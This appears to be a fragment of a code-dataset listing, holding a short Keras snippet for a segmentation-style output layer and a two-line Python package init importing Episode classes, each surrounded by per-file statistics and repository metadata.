model.add(tf.keras.layers.Reshape((nClasses, model.output_shape[-2] * model.output_shape[-1]),
input_shape=(nClasses, model.output_shape[-2], model.output_shape[-1])))
model.add(tf.keras.layers.Permute((2, 1)))
model.add(tf.keras.layers.Activation('softmax'))
model.compile(loss="categorical_crossentropy", optimizer=tf.keras.optimizers.Adam, metrics=['accuracy'])
| 42.202899
| 104
| 0.769574
| 432
| 2,912
| 5.092593
| 0.134259
| 0.130455
| 0.177273
| 0.265909
| 0.851364
| 0.831818
| 0.814545
| 0.814545
| 0.814545
| 0.749545
| 0
| 0.022901
| 0.055288
| 2,912
| 68
| 105
| 42.823529
| 0.776808
| 0.005151
| 0
| 0.666667
| 0
| 0
| 0.034554
| 0.008293
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019608
| 0
| 0.019608
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
79bfc319f03fd5f71b0bb59d154dc89366bf7aa2
| 99
|
py
|
Python
|
rl/episode/__init__.py
|
tomasruizt/Reinforcement-Learning
|
b8a01b08c1086da3c972846d3b038e233189103f
|
[
"Apache-2.0"
] | 3
|
2018-01-16T19:26:17.000Z
|
2018-02-06T19:38:04.000Z
|
rl/episode/__init__.py
|
tomasruizt/Reinforcement-Learning
|
b8a01b08c1086da3c972846d3b038e233189103f
|
[
"Apache-2.0"
] | null | null | null |
rl/episode/__init__.py
|
tomasruizt/Reinforcement-Learning
|
b8a01b08c1086da3c972846d3b038e233189103f
|
[
"Apache-2.0"
] | null | null | null |
from rl.episode.episode import Episode
from rl.episode.episode_serializer import EpisodeSerializer
| 33
| 59
| 0.878788
| 13
| 99
| 6.615385
| 0.461538
| 0.139535
| 0.302326
| 0.465116
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080808
| 99
| 2
| 60
| 49.5
| 0.945055
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.